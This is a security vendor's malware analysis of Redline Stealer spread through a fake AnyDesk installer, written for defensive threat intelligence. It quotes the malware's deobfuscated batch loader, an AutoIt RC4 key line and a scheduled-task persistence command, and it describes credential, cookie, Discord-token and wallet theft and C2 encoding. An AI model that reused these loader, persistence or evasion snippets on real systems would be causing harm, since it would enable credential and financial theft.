Cyber risk and advisory programs that identify security gaps and build strategies to address them.
MDR that provides improved detection, 24/7 threat hunting, end-to-end coverage and most of all, complete Response.
Our team delivers the fastest response time in the industry. Threat suppression within just 4 hours of being engaged.
Be protected by the best from Day 1.
24/7 Threat Investigation and Response.
Expert hunting, research and content.
Defend brute force attacks, active intrusions and unauthorized scans.
Safeguard endpoints 24/7 by isolating and remediating threats to prevent lateral spread.
Investigation and enhanced threat detection across multi-cloud or hybrid environments.
Configuration escalations, policy and posture management.
Detects malicious insider behavior leveraging Machine Learning models.
Customer testimonials and case studies.
Stories on cyberattacks, customers, employees, and more.
Cyber incident, analyst, and thought leadership reports.
Demonstrations, seminars and presentations on cybersecurity topics.
Information and solution briefs for our services.
MITRE ATT&CK Framework, Cybersecurity Assessment, SOC Calculator & more
Redline Stealer is one of the most popular stealers being sold and used by cybercriminals. The command and control (C2) panel does not require an attacker to log in via the Web UI; everything can be managed via the Redline client on the attacker’s virtual private server (VPS). The functionality of the stealer contains multiple capabilities including obfuscation, which makes it easy for attacker(s) to manage.
This malware analysis delves deeper into the technical details of how the Redline Stealer malware operates and our security recommendations to protect your organization from being exploited.
eSentire’s Threat Response Unit (TRU) has observed Redline Stealer being distributed via fake software, AnyDesk. The landing page of the malicious website is identical to the legitimate AnyDesk website (Figures 1-2).
The fake AnyDesk installer comes in an ISO image file and is 312MB in size. This is a common practice for stealers to pad the binary with junk hex bytes to increase the file size since some sandboxes and antiviruses have file size limitations. The infection chain is shown in Figure 3.
The AnyDesk binary contains the cabinet file within RCData (Figure 4). The extracted cabinet file contains the following:
The AnyDesk binary contains the section POSTRUNPROGRAM with the command cmd /c cmd < Saputo.potm & ping -n 5 localhost. The command executes the obfuscated Saputo.potm file and then pings the localhost five times, which is intended for the malware to sleep for 5 seconds so the obfuscated file can successfully run.
The deobfuscated Saputo.potm file is shown below:
tasklist /FI "imagename eq PSUAService.exe" 2>NUL | find /I /N "psuaservice.exe">NUL if not errorlevel 1 Set pEoQCZpLBzfzlhEvxHCjS=autoit.exe <nul set /p = "ZcDpijTWATBmXUDhlfiobLGsqbhgrZ" > pEoQCZpLBzfzlhEvxHCjS MrKXuUkCoPoGpMSbrwAewuXYoFFLRDZyqNxindstr /V /R "^YbeRstbFtOUDIqBrtdMHJUtzjhOkoKZFTdVtvyDmPFkahUrGQWaXBcArzIFrfkvxPgKsybGZNhRtJLyalocksetbQRLOA$" Ritornata.potm >> pEoQCZpLBzfzlhEvxHCjS ZcDpijTWATBmXUDhlfiobLGsqbhgrove Imagine.* t pEoQCZpLBzfzlhEvxHCjS t ping localhost -n 5
The script looks for PSUAService.exe on the infected system, which is a part of Panda Cloud Antivirus Software. If the mentioned antivirus is not present on the system, the malware will execute the main payload with the renamed AutoIt tool.
imagine.potm contains the obfuscated AutoIt script where Redline stealer resides. The embedded Redline binary contains within the obfuscated AutoIt script is shown in Figure 6.
The RC4 key to decode the script is concatenated with decimal values and subtracted by 2 as shown below (snipped of the obfuscated AutoIt script):
$jnpcgiMxrEdJ = zRAVrukiOcYK(mygFPnMUDEBWrobGzyl(mwKlCHGodCtOveXOxogMpp(Binary($uSDnetQy), Binary(TtmigjRVnUPf("59[53[51[58[53[53[56[53[58[59",2)))), $UkyGgZA, $XUeaTHbWBqM)
The eSentire TRU team has observed that the threat actor(s) have been using the AutoIt wrapper to obfuscate stealers such as Mars Stealer. For a more in-depth analysis, read our blog on Mars Stealer wrapped with AutoIt.
After the execution of the binary, the files mentioned in Figure 4 will be extracted from the CAB file into IXPxxx.TMP folder under the %TEMP% path as shown in Figure 7. The renamed NTDLL.DLL file is also dropped to the folder. This is a known technique used by threat actor(s) to bypass EDR detections – loading the copy of NTDLL.DLL during the runtime. We have briefly described this technique in our Mars Stealer analysis.
An additional folder is created to run a scheduled task from, this is the persistence technique to make sure that the infected host periodically communicates with the C2.
The scheduled task creation command line (the scheduled task is named Puoi and is set to run the z file under folder %TEMP%\zqNDtAgMrV, which is the obfuscated AutoIt script containing the stealer, every 3 minutes):
schtasks.exe /create /tn "Puoi" /tr "C:\\Users\\user\\AppData\\Local\\Temp\\zqNDtAgMrV\\PJDKIgRDMm.exe.com C:\\Users\\user\\AppData\\Local\\Temp\\zqNDtAgMrV\\z" /sc minute /mo 3 /F
The deobfuscated binary contains Redline Stealer that is injected into jsc.exe process after being decrypted by a rename AutoIt process as shown in Figure 7.
The extracted .NET Redline payload is approximately 619KB in size (MD5: ee5c2ec0ec6d2b5b9c2396fb7513f83b), the original filename is Test.exe, and the compilation timestamp is July 24, 2022. Upon opening the file in a debugger, we can see that the stealer performs enumeration on the victim’s machine looking for installed browsers, FTP connections, security tools, software, crypto wallets (Figure 9).
We can also see the stealer collecting credit card (CC) information on the infected host from Chrome browsers (Figure 10).
Redline Stealer, also known as REDGlade and Glade, first appeared on hacking forums in February 2020 (Figure 11). Redline is allegedly written based on feedback from people involved in carding, the term describing an unauthorized usage of credit cards.
Similar to Raccoon Stealer, Redline requires a VPS (Virtual Private Server) dedicated server to host the panel. The stealer can be easily bought via a Telegram Bot (Figure 12) using cryptocurrency as a payment method. The price for Redline is $150USD per month and $900USD for lifetime access. Upon purchasing Redline, the user gets a link to the private chat in Telegram. At the time of this analysis, roughly 400 members were part of the telegram group. Based on a review of the chats, Russian native speakers were the most active. After the subscription expires, the user is removed from the private chat.
Redline Stealer capabilities include:
What makes Redline Stealer popular is that the control panel is quite easy to navigate through; once the user buys the stealer, they get the detailed instructions in English and Russian on Redline functionality and installation steps (Figure 13).
It is worth noting that there are a number of fake Redline sellers on Telegram who profit by luring those interested in acquiring Redline Stealer, scamming them by taking their money, and not providing Redline in exchange. Upon purchasing a Redline subscription, the user gets the link to the private Telegram chat and the request to access chat must be approved by the administrator.
The Redline panel (Figure 14) is easy to navigate through and contains the following sections:
Facebook logs are one of the popular stolen logs being bought on hacking forums (Figures 22-23). The stealer logs that contain cookies can be enticing to cybercriminals. With the cookies, an attacker would be able to bypass two-factor authentication. By using the stolen cookie, the threat actor would be able to authenticate as another user on platforms such as YouTube and Facebook.
Cybercriminals buy stolen Facebook accounts to push malicious advertisements without the user’s knowledge. Spend logs are the accounts where an attacker can spend a certain amount of money to publish their ads per day (Figure 22).
There are numerous services available where attackers can sell their stolen logs. The prices depend on what type of logs they are selling (Figure 24).
Redline logs are also in high demand on dark web markets such as RussianMarket. We can see that compared to other stealers, Redline logs are the most sold by cybercriminals (Figure 25).
It is worth noting that Redline is being distributed not only via cracked or fake software. Other means to distribute Redline are via installers and YouTube traffic (Figure 26). With YouTube traffic, an attacker would create or purchase the channel and upload a short video with the description to lure the user to install the application via the direct link.
The installers push the stealer to third-party advertising networks or platforms. The advertising service will display the ads on different webpages based on the countries that the attacker(s) specifies. (Figure 27).
More seasoned cybercriminals usually crypt or obfuscate the payload through the well-known crypters in the hacking channels named Mastif and 11. Redline also advertises one of crypters named Spectrcrypt or Spectrum Crypt which comes for free with a one-month subscription purchase (Figure 28).
The Redline logs are quite popular for sale on hacker forums and Telegram (Figures 29-30).
The non-obfuscated Redline payload is a 32-bit .NET binary with 107 KB in size. The hash of the payload and original filename changes each time the build/payload is generated from the Redline panel.
The Argument class contains the encoded payload configuration for C2 communication including the IP address, Build ID, version and the XOR key used to decrypt the configuration parameters (Figure 31).
The encoded strings are base64-encoded and XOR-ed with the hardcoded key “Raves” then base64-encoded again (Figure 32).
Under Entity16, the stealer enumerates the Login Data, Web Data, Cookies folders for Chrome and Opera GX Stable. It also searches for crypto wallet browser extensions under Local Extension Settings folders for Chrome (Figure 33).
The crypto wallet extensions decoded from Base64-encoded blob:
Entity15 is likely used for performing the loader tasks (Figure 34).
The ConfigReader class looks for crypto wallets in the folders specified by an attacker in settings. Entity17 contains the information on crypto wallets. Entity16 stores the path to crypto wallets (Figure 35).
ConnectionProvider class contains the C2 communication method used in Redline. Communication with the C2 server is established via Windows Communication Foundation (WCF) with NetTCPBinding. The WCF TCP transport utilizes the net.tcp:// protocol. The destination port is specified by an attacker (Figure 36).
The example of C2 traffic generated by the workstation infected with Redline containing the stealer configuration, C2 IP, host information and files residing on the host (Figure 37); tempuri[.]org is the default WCF namespace and should not be considered as the only indicator of Redline compromise.
Entity5 gathers Discord tokens under \AppData\Roaming\discord\Local Storage\leveldb path from .log and .db files (Figure 38). Redline harvests the Discord tokens because they can bypass Two Factor Authentication (2FA) and allow users to access their accounts without providing credentials. All that is needed is the link. For detection evasion purposes, Redline adds random words into the strings and then replaces them.
Entity6 contains the module responsible for launching the loader tasks DownloadAndEx and Download (Figure 39).
Entity8, 10, 11 and 12 within EntityCreator class scans for autofills, cookies, credentials, and credit cards accordingly (Figure 40). The credentials will be then decrypted in the EntityReader class.
Previously, we mentioned that Redline stealer does not exfiltrate logs from CIS countries. The stealer checks for the local time zone of the infected machine and the default user interface language for the presence of languages used by CIS countries (Figure 41).
PartsSender class contains all the information (logs) that are sent to the attacker including user’s system information, files, wallets, credentials, and screenshot (Figure 42).
The Redline developers cleverly named the Telegram stealing module RosComNadzor (The Federal Service for Supervision of Communications, Information Technology and Mass Media).
Finally, SystemInfoHelper class (Figure 43) gathers the user’s system information, list of processes, browsers, installed programs, and sends them to the attacker as text files (Figures 44-45).
Our Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create practical outcomes for our customers. We are taking a comprehensive response approach to combat modern cybersecurity threats by deploying countermeasures, such as:
Our detection content is supported by investigation runbooks, ensuring our team of 24/7 SOC Cyber Analysts respond rapidly to any intrusion attempts related to known malware Tactics, Techniques, and Procedures (TTPs). In addition, TRU closely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.
We recommend implementing the following controls to help secure your organization against the Redline Stealer malware:
While the TTPs used by threat actor(s) grow in sophistication, they lead to a certain level of difficulties at which critical business decisions must be made. Preventing the various attack technique and tactics utilized by the modern threat actor requires actively monitoring the threat landscape, developing, and deploying endpoint detections, and the ability to investigate logs & network data during active intrusions.
eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.
If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.
Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.
Our industry-renowned Threat Response Unit (TRU) is an elite team of threat hunters and researchers, that supports our 24/7 Security Operations Centers (SOCs), builds detection models across our Atlas XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. TRU has been recognized for its threat hunting, original research and content development capabilities. TRU is strategically organized into cross-functional groups to protect you against advanced and emerging threats, allowing your organization to gain leading threat intelligence and incredible cybersecurity acumen.